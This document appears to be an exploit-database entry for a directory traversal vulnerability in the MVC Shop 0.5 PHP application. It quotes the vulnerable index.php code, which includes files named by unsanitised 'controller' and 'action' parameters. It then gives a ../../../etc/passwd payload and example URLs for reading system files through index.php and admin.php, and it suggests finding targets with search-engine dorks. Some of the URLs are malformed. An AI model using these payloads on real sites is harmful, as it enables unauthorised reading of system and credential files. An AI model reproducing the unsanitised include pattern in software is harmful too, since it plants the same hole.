Exploit for MVC Shop 0.5 Directory Traversal

Name: Exploit for MVC Shop 0.5 Directory Traversal
Rating: 5 (224 reviews)
2023-06-09 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:172811
====================================================================================================================================  
| # Title : mvc-shop v0.5 Directory Traversal Vulnerability Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |   
| # Vendor : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5 |  
| # Dork : |  
====================================================================================================================================  
  
  
poc :  
  
  
[+] Dorking İn Google Or Other Search Enggine .  
  
[+] infested file : index.php & admin.php  
  
<!--  
Developed by: TanHongIT  
Website: https://tanhongit.com - https://tanhongit.net  
Github: https://github.com/TanHongIT  
-->  
<?php  
session_start();  
require_once('lib/model.php');  
require_once('lib/functions.php');  
require_once('content/models/cart.php');  
require "lib/statistics.php";  
require "lib/counter.php";  
// $count_file = 'logs/counter.txt';  
// $ip_file = 'logs/ip.txt';  
// function counting_ip()  
// {  
// $ip = $_SERVER['REMOTE_ADDR'];  
// global $count_file, $ip_file;  
  
// if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {  
// $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;  
// file_put_contents($ip_file, $ip . "\n", FILE_APPEND);  
// file_put_contents($count_file, ++$current_val);  
// }  
// }  
// counting_ip();  
if (isset($_GET['controller'])) $controller = $_GET['controller'];  
else $controller = 'home';  
if (isset($_GET['action'])) $action = $_GET['action'];  
else $action = 'index';  
$file = 'content/controllers/' . $controller . '/' . $action . '.php';  
if (file_exists($file)) {  
require($file);  
} else {  
show_404();  
}  
  
  
[+] use payload : ../../../../../../../../../etc/passwd  
  
[+] https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd  
  
[+] https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd  
  
  
== Greetings to :===========================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |   
============================================================================================